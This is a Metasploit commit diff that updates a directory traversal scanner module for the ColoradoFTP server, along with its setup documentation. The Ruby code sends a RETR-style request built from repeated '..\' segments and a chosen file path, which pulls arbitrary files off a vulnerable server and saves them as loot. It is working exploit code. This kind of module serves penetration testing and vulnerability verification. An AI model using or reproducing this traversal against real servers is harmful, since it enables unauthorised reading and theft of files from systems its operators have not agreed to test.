Land rapid7#8632, colorado ftp fixes

Author: pbarry-r7

documentation/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.md

@@ -6,7 +6,7 @@ While the application is based in java, I was only able to get it to exploit aga
 
   [official site](http://cftp.coldcore.com/files/coloradoftp-prime-8.zip?site=cft1&rv=19.1&nc=1) or [github backup](https://github.com/h00die/MSF-Testing-Scripts/raw/master/coloradoftp-prime-8.zip)
 
-When installing, you must edit conf/beans.xml line 182 "localIp" to put in your IP or else `pasv` won't work.
+When installing, you must edit conf/beans.xml line 183 "remoteIp" to put in your IP or else `pasv` won't work.
 
 ## Verification Steps
 

modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb

@@ -28,7 +28,8 @@ def initialize(info = {})
       'References'     =>
         [
           [ 'EDB', '40231'],
-          [ 'URL', 'https://bitbucket.org/nolife/coloradoftp/commits/16a60c4a74ef477cd8c16ca82442eaab2fbe8c86']
+          [ 'URL', 'https://bitbucket.org/nolife/coloradoftp/commits/16a60c4a74ef477cd8c16ca82442eaab2fbe8c86'],
+          [ 'URL', 'http://www.securityfocus.com/archive/1/539186']
         ],
       'DisclosureDate' => 'Aug 11 2016'
     ))
@@ -47,7 +48,7 @@ def check_host(ip)
     begin
       connect
       if /Welcome to ColoradoFTP - the open source FTP server \(www\.coldcore\.com\)/i === banner
-        return Exploit::CheckCode::Appears
+        return Exploit::CheckCode::Detected
       end
     ensure
       disconnect
@@ -59,51 +60,31 @@ def check_host(ip)
   def run_host(ip)
     begin
       connect_login
-      sock = data_connect
+      file_path = datastore['PATH']
+      file = ::File.basename(file_path)
 
-      # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb
-      # and  #7582
-      if sock.nil?
-        error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
-        print_status(error_msg)
-        elog(error_msg)
+      # make RETR request and store server response message...
+      retr_cmd = '\\\\\\' + ("..\\" * datastore['DEPTH'] ) + "#{file_path}"
+      res = send_cmd_data( ['get', retr_cmd], '')
+      unless res.nil?
+        print_status(res[0])
+        response_data = res[1]
       else
-        file_path = datastore['PATH']
-        file = ::File.basename(file_path)
-
-        # make RETR request and store server response message...
-        retr_cmd = '\\\\\\' + ("..\\" * datastore['DEPTH'] ) + "#{file_path}"
-        res = send_cmd( ["retr", retr_cmd], true)
-        print_status(res)
-
-        # dont assume theres still a sock to read from. Per #7582
-        if sock.nil?
-          error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
-          print_status(error_msg)
-          elog(error_msg)
-          return
-        else
-          # read the file data from the socket that we opened
-          response_data = sock.read(1024)
-        end
-
-        unless response_data
-          print_error("#{file} not found")
-          return
-        end
-
-        if response_data.length == 0
-          print_status("File (#{file_path})from #{peer} is empty...")
-          return
-        end
+        print_error("#{file} not found or invalid login")
+        return
+      end
 
-        # store file data to loot
-        loot_file = store_loot("coloradoftp.ftp.data", "text", rhost, response_data, file, file_path)
-        vprint_status("Data returned:\n")
-        vprint_line(response_data)
-        print_good("Stored #{file_path} to #{loot_file}")
+      if response_data.length == 0
+        print_status("File (#{file_path})from #{peer} is empty...")
+        return
       end
 
+      # store file data to loot
+      loot_file = store_loot("coloradoftp.ftp.data", "text", rhost, response_data, file, file_path)
+      vprint_status("Data returned:\n")
+      vprint_line(response_data)
+      print_good("Stored #{file_path} to #{loot_file}")
+
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
       vprint_error(e.message)
       elog("#{e.class} #{e.message} #{e.backtrace * "\n"}")